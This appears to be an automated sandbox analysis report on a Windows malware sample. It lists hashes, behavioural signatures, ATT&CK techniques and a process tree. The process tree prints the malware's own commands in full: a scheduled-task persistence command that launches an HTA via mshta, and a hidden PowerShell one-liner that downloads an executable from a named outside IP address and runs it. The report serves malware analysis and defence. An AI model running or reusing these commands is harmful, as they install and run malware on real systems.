Analysis
-
max time kernel
149s -
max time network
152s -
platform
windows10-2004_x64 -
resource
win10v2004-20250207-en -
resource tags
arch:x64arch:x86image:win10v2004-20250207-enlocale:en-usos:windows10-2004-x64system -
submitted
10-02-2025 16:51
Static task
static1
Behavioral task
behavioral1
Sample
234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe
Resource
win7-20241010-en
General
-
Target
234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe
-
Size
938KB
-
MD5
75338f0061d3a9d0e9fec49eb8d394f9
-
SHA1
bc9e82fce457c2dab9c59935d3ea978728cda650
-
SHA256
234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13
-
SHA512
7b7fbaa8573f5097ecd1862fc7df058e3ce2fead3ebb37033ed549902a75dcb21cc0c23668ce34ad837f8a62c1c710a0953e58b31cab8386ad1bf8bfa7400f2d
-
SSDEEP
24576:/qDEvCTbMWu7rQYlBQcBiT6rprG8ayrF:/TvC/MTQYxsWR7ayr
Malware Config
Extracted
http://185.215.113.16/mine/random.exe
Signatures
-
Blocklisted process makes network request 1 IoCs
flow pid Process 9 2676 powershell.exe -
Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs
Run Powershell and hide display window.
pid Process 2676 powershell.exe -
Downloads MZ/PE file 2 IoCs
flow pid Process 20 5080 Process not Found 9 2676 powershell.exe -
Checks computer location settings 2 TTPs 1 IoCs
Looks up country code configured in the registry, likely geofence.
description ioc Process Key value queried \REGISTRY\USER\S-1-5-21-1639772215-809007892-4072230623-1000\Control Panel\International\Geo\Nation mshta.exe -
Enumerates physical storage devices 1 TTPs
Attempts to interact with connected storage/optical drive(s).
-
System Location Discovery: System Language Discovery 1 TTPs 6 IoCs
Attempt gather information about the system language of a victim in order to infer the geographical location of that host.
description ioc Process Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language cmd.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language schtasks.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language powershell.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language MicrosoftEdgeUpdate.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language 234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe Key opened \REGISTRY\MACHINE\SYSTEM\ControlSet001\Control\NLS\Language mshta.exe -
System Network Configuration Discovery: Internet Connection Discovery 1 TTPs 1 IoCs
Adversaries may check for Internet connectivity on compromised systems.
pid Process 3028 MicrosoftEdgeUpdate.exe -
Scheduled Task/Job: Scheduled Task 1 TTPs 1 IoCs
Schtasks is often used by malware for persistence or to perform post-infection execution.
pid Process 1072 schtasks.exe -
Suspicious behavior: EnumeratesProcesses 2 IoCs
pid Process 2676 powershell.exe 2676 powershell.exe -
Suspicious use of AdjustPrivilegeToken 1 IoCs
description pid Process Token: SeDebugPrivilege 2676 powershell.exe -
Suspicious use of FindShellTrayWindow 3 IoCs
pid Process 5096 234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe 5096 234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe 5096 234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe -
Suspicious use of SendNotifyMessage 3 IoCs
pid Process 5096 234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe 5096 234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe 5096 234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe -
Suspicious use of WriteProcessMemory 12 IoCs
description pid Process procid_target PID 5096 wrote to memory of 1944 5096 234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe 88 PID 5096 wrote to memory of 1944 5096 234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe 88 PID 5096 wrote to memory of 1944 5096 234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe 88 PID 5096 wrote to memory of 4956 5096 234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe 89 PID 5096 wrote to memory of 4956 5096 234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe 89 PID 5096 wrote to memory of 4956 5096 234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe 89 PID 1944 wrote to memory of 1072 1944 cmd.exe 91 PID 1944 wrote to memory of 1072 1944 cmd.exe 91 PID 1944 wrote to memory of 1072 1944 cmd.exe 91 PID 4956 wrote to memory of 2676 4956 mshta.exe 93 PID 4956 wrote to memory of 2676 4956 mshta.exe 93 PID 4956 wrote to memory of 2676 4956 mshta.exe 93
Processes
-
C:\Users\Admin\AppData\Local\Temp\234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe"C:\Users\Admin\AppData\Local\Temp\234f654f4de2449b6050d2a31e285f6936c80bce39be3b4f68a3ce1899fdaf13.exe"1⤵
- System Location Discovery: System Language Discovery
- Suspicious use of FindShellTrayWindow
- Suspicious use of SendNotifyMessage
- Suspicious use of WriteProcessMemory
PID:5096 -
C:\Windows\SysWOW64\cmd.exeC:\Windows\system32\cmd.exe /c schtasks /create /tn d1a1lma4uQe /tr "mshta C:\Users\Admin\AppData\Local\Temp\wI5Wsn16z.hta" /sc minute /mo 25 /ru "Admin" /f2⤵
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:1944 -
C:\Windows\SysWOW64\schtasks.exeschtasks /create /tn d1a1lma4uQe /tr "mshta C:\Users\Admin\AppData\Local\Temp\wI5Wsn16z.hta" /sc minute /mo 25 /ru "Admin" /f3⤵
- System Location Discovery: System Language Discovery
- Scheduled Task/Job: Scheduled Task
PID:1072
-
-
-
C:\Windows\SysWOW64\mshta.exemshta C:\Users\Admin\AppData\Local\Temp\wI5Wsn16z.hta2⤵
- Checks computer location settings
- System Location Discovery: System Language Discovery
- Suspicious use of WriteProcessMemory
PID:4956 -
C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" -WindowStyle Hidden $d=$env:temp+'KXN9SZ89JSNQ0CY2EFU18QOCSUEVMGZN.EXE';(New-Object System.Net.WebClient).DownloadFile('http://185.215.113.16/mine/random.exe',$d);Start-Process $d;3⤵
- Blocklisted process makes network request
- Command and Scripting Interpreter: PowerShell
- Downloads MZ/PE file
- System Location Discovery: System Language Discovery
- Suspicious behavior: EnumeratesProcesses
- Suspicious use of AdjustPrivilegeToken
PID:2676
-
-
-
C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe"C:\Program Files (x86)\Microsoft\EdgeUpdate\MicrosoftEdgeUpdate.exe" /ping PD94bWwgdmVyc2lvbj0iMS4wIiBlbmNvZGluZz0iVVRGLTgiPz48cmVxdWVzdCBwcm90b2NvbD0iMy4wIiB1cGRhdGVyPSJPbWFoYSIgdXBkYXRlcnZlcnNpb249IjEuMy4xOTUuNDMiIHNoZWxsX3ZlcnNpb249IjEuMy4xOTUuNDMiIGlzbWFjaGluZT0iMSIgc2Vzc2lvbmlkPSJ7NzExOTk4QjAtMTRDNy00QjMyLUExOEQtRTk1REZENURFQ0NGfSIgdXNlcmlkPSJ7MDM5Qjk4MDYtRDgyMi00NjI3LUIyNUQtRDJBNzhDQTk2NzQyfSIgaW5zdGFsbHNvdXJjZT0ibGltaXRlZCIgcmVxdWVzdGlkPSJ7Nzk5Q0JBMDctRTI0Ni00NkFCLUE3NDQtNzA0RUNFRjMwNkQ3fSIgZGVkdXA9ImNyIiBkb21haW5qb2luZWQ9IjAiPjxodyBsb2dpY2FsX2NwdXM9IjIiIHBoeXNtZW1vcnk9IjQiIGRpc2tfdHlwZT0iMiIgc3NlPSIxIiBzc2UyPSIxIiBzc2UzPSIxIiBzc3NlMz0iMSIgc3NlNDE9IjEiIHNzZTQyPSIxIiBhdng9IjEiLz48b3MgcGxhdGZvcm09IndpbiIgdmVyc2lvbj0iMTAuMC4xOTA0MS4xMjg4IiBzcD0iIiBhcmNoPSJ4NjQiIHByb2R1Y3RfdHlwZT0iNDgiIGlzX3dpcD0iMCIgaXNfaW5fbG9ja2Rvd25fbW9kZT0iMCIvPjxvZW0gcHJvZHVjdF9tYW51ZmFjdHVyZXI9IiIgcHJvZHVjdF9uYW1lPSIiLz48ZXhwIGV0YWc9IiZxdW90O0UreGJBejZZNnNVMTI4OWJTNnFsNFZSTGJramZCVUdUTUpzanJIcjQ0aUk9JnF1b3Q7Ii8-PGFwcCBhcHBpZD0iezhBNjlEMzQ1LUQ1NjQtNDYzYy1BRkYxLUE2OUQ5RTUzMEY5Nn0iIHZlcnNpb249IjEyMy4wLjYzMTIuMTIzIiBuZXh0dmVyc2lvbj0iIiBsYW5nPSJlbiIgYnJhbmQ9IkdHTFMiIGNsaWVudD0iIiBpbnN0YWxsYWdlPSIzIiBpbnN0YWxsZGF0ZXRpbWU9IjE3Mzg5NDY4ODkiIG9vYmVfaW5zdGFsbF90aW1lPSIxMzM4MzQxOTM2NTgwOTAwMDAiPjxldmVudCBldmVudHR5cGU9IjMxIiBldmVudHJlc3VsdD0iMSIgZXJyb3Jjb2RlPSIwIiBleHRyYWNvZGUxPSIyMTc5ODYyIiBzeXN0ZW1fdXB0aW1lX3RpY2tzPSI1MTExNTg1OTU1Ii8-PC9hcHA-PC9yZXF1ZXN0Pg1⤵
- System Location Discovery: System Language Discovery
- System Network Configuration Discovery: Internet Connection Discovery
PID:3028
Network
MITRE ATT&CK Enterprise v15
Execution
Command and Scripting Interpreter
1PowerShell
1Scheduled Task/Job
1Scheduled Task
1Replay Monitor
Loading Replay Monitor...
Downloads
-
Filesize
60B
MD5d17fe0a3f47be24a6453e9ef58c94641
SHA16ab83620379fc69f80c0242105ddffd7d98d5d9d
SHA25696ad1146eb96877eab5942ae0736b82d8b5e2039a80d3d6932665c1a4c87dcf7
SHA5125b592e58f26c264604f98f6aa12860758ce606d1c63220736cf0c779e4e18e3cec8706930a16c38b20161754d1017d1657d35258e58ca22b18f5b232880dec82
-
Filesize
720B
MD59e2620a3476b0afc17e6997638032283
SHA1a0633667a028a1d1943ca1e44564611706606e80
SHA256167fb525a6f473ad3c625c66881bfc03aa5ea9c0500637f94c27eccc5277f018
SHA5125c8bfb58153cb5b85f88d5802d5fc52928bf1279301df3184a8bc3a016c7abbc13ccb7c44f158924eb41268326d83400f4a3bb1eca1c5a073b74ba7ba0bf154c